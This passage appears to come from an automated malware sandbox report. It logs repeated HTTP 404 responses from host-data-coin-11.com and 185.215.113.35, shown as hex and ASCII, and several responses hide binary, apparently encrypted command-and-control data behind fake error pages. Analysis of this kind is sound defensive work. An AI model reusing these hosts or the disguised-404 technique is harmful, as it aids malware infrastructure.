67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 41 5b bb 06 f5 ee 66 b9 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevA[fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 11:30:13 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.35 Port 80</address></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 88 30 e4 00 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OV=AIS00
